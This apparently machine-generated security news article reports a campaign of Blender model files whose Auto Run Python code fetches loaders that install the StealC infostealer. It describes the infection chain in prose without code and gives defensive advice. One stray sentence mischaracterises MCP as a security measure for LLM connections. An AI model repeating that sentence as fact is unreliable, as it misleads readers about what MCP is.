Ethical Hacking News
Malicious Blender model files have been found to deliver StealC infostealing malware, a highly adaptable and sophisticated threat that can infiltrate a wide range of platforms and applications.
Malicious actors have been exploiting vulnerabilities in Blender model files by embedding Python code. The Auto Run feature in Blender has become a vector for the spread of malware. A recent campaign involves malicious .blend files containing embedded Python code that fetches malware loaders from attacker-controlled IPs. The payloads delivered by this malicious campaign are variants of StealC infostealer malware, which can exfiltrate data from multiple platforms and bypass UAC mechanisms. Blender users should exercise extreme caution when using files sourced from untrusted marketplaces like CGTrader and employ sandboxed environments for testing.
The world of 3D modeling has long been a haven for creativity and self-expression, but like any digital realm, it's not immune to the threats that lurk in the shadows. A recent campaign has brought attention to a malicious actor exploiting this vulnerability by embedding Python code within Blender model files, specifically targeting the popular 3D creation suite through CGTrader, a leading marketplace for 3D models.
Blender, an open-source powerhouse, offers users a plethora of features and automation tools to streamline their workflow. However, when left unchecked, it can also provide an entry point for malicious actors to infiltrate systems. The Auto Run feature in Blender, designed to automate tasks such as facial controls and custom user interface panels, has unwittingly become a vector for the spread of malware.
Researchers at cybersecurity firm Morphisec have been tracking this malicious campaign, which involves malicious .blend files containing embedded Python code that fetches a malware loader from a Cloudflare Workers domain. This malware loader then retrieves two ZIP archives, ZalypaGyliveraV1 and BLENDERX, from attacker-controlled IPs. These archives unpack into the %TEMP% folder and deposit LNK files in the Startup directory for persistence.
The payloads delivered by this malicious campaign are none other than the latest variant of StealC infostealer malware. StealC has garnered attention within the cybersecurity community due to its exfiltration capabilities from a wide array of platforms, including 23+ browsers, numerous cryptocurrency wallet browser extensions and apps, Telegram, Discord, Tox, Pidgin, VPN clients (ProtonVPN, OpenVPN), and mail clients (Thunderbird). Moreover, this variant boasts an updated UAC bypass mechanism.
Despite the documentation of StealC malware dating back to 2023, recent variants have proven elusive for anti-virus products. Morphisec notes that no security engine on VirusTotal detected the StealC variant they analyzed, a testament to the evolving and adaptive nature of these threats.
Blender users are advised to exercise extreme caution when using files sourced from untrusted marketplaces like CGTrader. Given the lack of scrutiny over user-submitted content, Blender assets should be treated as executable files, with only trusted publishers deserving of blind trust. For those who wish to use such assets, it's recommended that they employ sandboxed environments for testing.
As MCP (Model Context Protocol) gains prominence in securing Large Language Models connections, security teams are racing against the clock to fortify these services against emerging threats. In light of this campaign, cybersecurity awareness and vigilance are more crucial than ever.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Tangled-Web-of-Malice-How-StealC-Infostealing-Malware-Hides-Within-Blender-3D-Model-Files-ehn.shtml
https://www.bleepingcomputer.com/news/security/malicious-blender-model-files-deliver-stealc-infostealing-malware/
Published: Mon Nov 24 16:07:18 2025 by llama3.2 3B Q4_K_M
